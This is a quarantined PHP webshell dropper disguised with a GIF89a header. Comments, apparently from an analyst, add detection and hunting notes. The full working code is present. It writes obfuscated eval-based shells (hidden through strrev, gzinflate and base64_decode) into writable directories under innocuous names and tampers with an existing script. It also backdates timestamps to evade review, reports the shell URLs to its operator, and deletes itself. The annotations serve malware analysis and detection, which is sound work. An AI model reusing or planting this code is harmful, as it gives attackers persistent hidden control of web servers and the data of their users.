Current File : /home/bahiapar/.quarantine/20200927-053251-X3BqU3vpUAOhJjITKd1CaAAAAA4-file-aZOTBB.1601202772_1

GIF89a????!?,D;
<?php

// Helper routines used by the dropper logic further down.
// NOTE(analysis): the file opens with GIF89a bytes ahead of the PHP open tag, presumably so
// that upload filters which only inspect leading magic bytes classify it as an image.
if (!function_exists('doc_root')) {
  /**
   * Resolves the web document root of the host the script is running on.
   *
   * Order of preference: $_SERVER['DOCUMENT_ROOT'], then $_ENV['DOCUMENT_ROOT'],
   * and as a last resort the current working directory with the directory part
   * of REQUEST_URI stripped from its end.
   *
   * @return string Path that the rest of the script treats as the site root.
   */
  function doc_root() {
    return !empty($_SERVER['DOCUMENT_ROOT'])  ?
      $_SERVER['DOCUMENT_ROOT']               :
      (!empty($_ENV['DOCUMENT_ROOT'])         ?
      $_ENV['DOCUMENT_ROOT']                  :
      // Fallback: derive the root from getcwd() by removing the request's directory suffix.
      preg_replace('#' . dirname($_SERVER['REQUEST_URI']) . '$#', '', getcwd()))
    ;
  }
}

if (!function_exists('create_filename')) {
  /**
   * Returns one file name picked pseudo-randomly from a fixed list of eleven.
   *
   * Detection note: the list is hard-coded, so these names can serve as file-name
   * indicators when sweeping a document root. A name match alone is weak evidence;
   * pair it with a content check for the obfuscated payload written by this script.
   *
   * @return string One of the hard-coded *.php names.
   */
  function create_filename() {
    $vars = array('hk_xor.php', 'hkxor.php', 'hl7050.php', 'hl_analize.php', 'hlangana.php', 'hl_core.php', 'hl_cron.php', 'hle.php', 'hllogin.php', 'h_login.php', 'hlogin.php');
        
    // mt_rand() picks an index across the whole list.
    return $vars[mt_rand(0, count($vars) - 1)];
  }
}

if (!function_exists('writable_dirs')) {
  /**
   * Lists the immediate subdirectories of $path that the PHP process can write to.
   *
   * The scan is one level deep (no recursion). Entries named 'cgi-bin' and entries
   * whose name starts with '.' are skipped.
   *
   * Hardening note: every directory returned here is one the web-server user may
   * write to; tightening those permissions shrinks the set of usable locations.
   *
   * @param string $path Directory to scan; defaults to the current directory.
   * @return array List of "$path/entry" strings for writable subdirectories.
   */
  function writable_dirs($path = '.') {
    $dir    = dir($path);
    $result = array(); 

    while (false !== ($entry = $dir->read())) {
      // Skip cgi-bin and dot entries (this also covers '.' and '..').
      if ($entry === 'cgi-bin' || substr($entry, 0, 1) === '.') continue;
      if (is_dir($path . '/' . $entry) && is_writable($path . '/' . $entry)) $result[] = $path . '/' . $entry;
    }

    return $result;
  }
}

// Turn off PHP error reporting for this request and remove the execution time limit,
// so failures in the steps below produce no error output and the run is not cut short.
error_reporting(0);
set_time_limit(0);

// Payload that gets written to disk further down, held verbatim in a nowdoc.
// Structure, for static detection:
//   - a long array of short base64-alphabet fragments that is joined with implode();
//   - a function name built from hex escapes and reversed with strrev(), which
//     resolves to preg_replace_callback; the pattern is the reverse of "/+./";
//   - a callback that rebuilds two more names from reversed fragments (they resolve
//     to gzinflate and base64_decode) and passes the result to eval().
// The decoded body is not visible on this page. Signatures keyed on
// strrev + implode + eval inside a callback are sturdier than ones keyed on the fragments.
$__shell =<<<'EOT'
<?php $v12452c47 = array('hZB', 'ta8', 'I', 'wFI', 'X/', 'Sihi', 'WvB', '1G/', 'swcV', 'S0OHG', '2UuMY', 'qISq', 'ty6s', 'S0KS', 'yWT', 'svy9t', 'B', 'Sc', 'o66d', 'ynnv', 'uuT', 'k+K', 'C', 'U', 'UVS', 'CFMoz', 'v3J', 'bXQT', '7jjGo', 'wrrN', 'lW', 'mbJ', 'g', 'RZT2', 'q', 'md00z', 'sr', 'pBy', 'q+UlY', 'Cl', 'y', 'mc5J', 'hQ4', 'DssAK', 'rz', 'wP', 'fSO', 'pGDf', 'oJHb', 'QD4JM', 'w', '1/D', 'NJpZ', 'CEcH', '7JPM', 'XSca', '7u/o', 'FjZi', 'C', '642', '9gHC', 'tG/zP', 'wX7', 'q/h', 'sV/5d', 'ips', 'F8U', 's', 'QL', '/', 'A', 'TI', 'V', 'P', 'aj', '0I', 'ShIQ', 'GYT8', 'ajMK', 'h', 'N', 'aJqFf', '07hbp', 'dhNe', 'MJ', '+qA86', 's', 'r28Qk', 'qItS', 'lgH', 'd', 'ga', 'EbwQ', '1wo1', '0', 's3+RD', 's8m4/', 'D', 'T4WJW', '9OAPu', 'FiY', 'PP', 'aK', 'WdywK', 'z0i', 'PzG', 'f1', '0WQax', 'a', 'Qej', 'f', 'FlQ/u', 'mCE1', 'l10', '+Ft', 'ASb', 'D', '5ln', '4x', 'p', 'O8', 'hQ/zc', 'Tm3b', 'U', 'TNfQc', '9', 'cc0', 'eC1Ue', '4Qu', '1dM', 'T42AS', 'kY', 'D', '2Bo', 'MYrx', 'r', 'O0j', 'iNY8', 'HA', 'i4L', 'LWEv', 'UkjuX', 'ls/DQ', 't1kQk', 'Mu', 'F', '73b5', 'r', '+Y6fw', 'C', ); $f = strrev("\x6b" . "\x63" . "\x61" . "\x62" . "\x6c" . "\x6c" . "\x61" . "\x63" . "\x5f" . "\x65" . "\x63" . "\x61" ."\x6c" . "\x70" . "\x65" . "\x72" . "\x5f" . "\x67" . "\x65" . "\x72" . "\x70"); $f(strrev("/+./"), function ($matches){ $f1 = strrev(implode("", array('e', 't', 'alf', 'ni', 'zg', ))); $f2 = strrev(implode("", array('ed', 'oc', 'ed_', '46e', 's', 'ab', ))); eval($f1($f2($matches[0]))); }, implode("", $v12452c47)); ?>
EOT;

// Resolve the document root and collect the writable directories directly beneath it.
$root = doc_root();
$dirs = writable_dirs($root);

// Tampering step: modify an existing script one directory above the working directory.
// $sf_close holds a PHP line that exits when the 'src' request parameter contains
// 'http' or '.php'. NOTE(analysis): the variable name suggests the intent is to shut an
// existing entry point against further use; confirm against the access logs for that file.
$sfn = '../u9emft2d5vq6wpw.php';
$sf_close = 'if (strpos($_REQUEST[\'src\'], \'http\') !== FALSE OR strpos($_REQUEST[\'src\'], \'.php\') !== FALSE) exit;';
// Only acts when the target is an existing, writable regular file.
if (is_file($sfn) && is_writeable($sfn)) {
  $sfdata = file_get_contents($sfn);

  if (strpos($sfdata, '<?php') !== false) {
    // Insert the guard line after every PHP open tag found in the file.
    $sfdata = str_replace('<?php', "<?php\n" . $sf_close, $sfdata);

    // Remember the modification time so it can be put back after the write.
    $mtime = filemtime($sfn);

    if ($sfd = fopen($sfn, 'w')) {
      fwrite($sfd, $sfdata);
      fclose($fd);

      // Timestamp reset: mtime and atime go back to the pre-edit value, so a sweep for
      // "recently modified" files misses this change. The inode change time cannot be
      // set through touch(), so ctime and file hashes remain usable for triage.
      @touch($sfn, $mtime, $mtime);
    }
  }
}

// Drop step: write the payload into a few of the writable directories found above.
if (count($dirs) > 0) {
  // Two or three copies, capped at the number of directories available.
  $shells = mt_rand(2, 3);

  if (count($dirs) < $shells) $shells = count($dirs);

  // Randomise which directories are used.
  shuffle($dirs);

  for ($i = 0; $i < $shells; $i++) {
    $path   = $dirs[$i] . '/' . create_filename();
    // Capture the directory's mtime before the write changes it.
    $mtime  = filemtime(dirname($path));

    if (@$fd = fopen($path, 'w')) {
      fwrite($fd, $__shell);
      fclose($fd);

      // Both the directory and the new file are stamped with the directory's earlier
      // mtime. Hunting heuristic: a .php file whose mtime equals its parent directory's
      // mtime while its ctime is newer deserves a closer look.
      touch(dirname($path), $mtime, $mtime);
      touch($path, $mtime, $mtime);

      // Report the location of the written file in the HTTP response, wrapped in a
      // marker tag, presumably for an automated client to parse. The marker strings
      // are usable as indicators for response-body inspection.
      $shell = 'http://' . $_SERVER['HTTP_HOST'] . str_replace($root, '', $path);
      echo '<apicalloie>', $shell, '</apicalloie>', "\n";
    }
  }
} else {
    // No writable directory under the root: report the host name under a different marker.
    echo '<apicall_nocomplete>', $_SERVER['HTTP_HOST'], '</apicall_nocomplete>';
}

// Disabled line kept by the author: it would rename the wp-file-manager plugin's
// connector.minimal.php to a "-dist" name. It is commented out and has no effect here.
// NOTE(analysis): the path points at the wp-file-manager plugin, so check whether that
// plugin is installed and review requests to this connector in the access logs.
//@rename($root . '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php', $root . '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php-dist');

// Self-removal: the script deletes its own file once it has run. On a host where it
// executed, expect the dropper to be absent; the written files, the edited script and
// the web-server logs are what remains to examine.
unlink(__FILE__);

?>
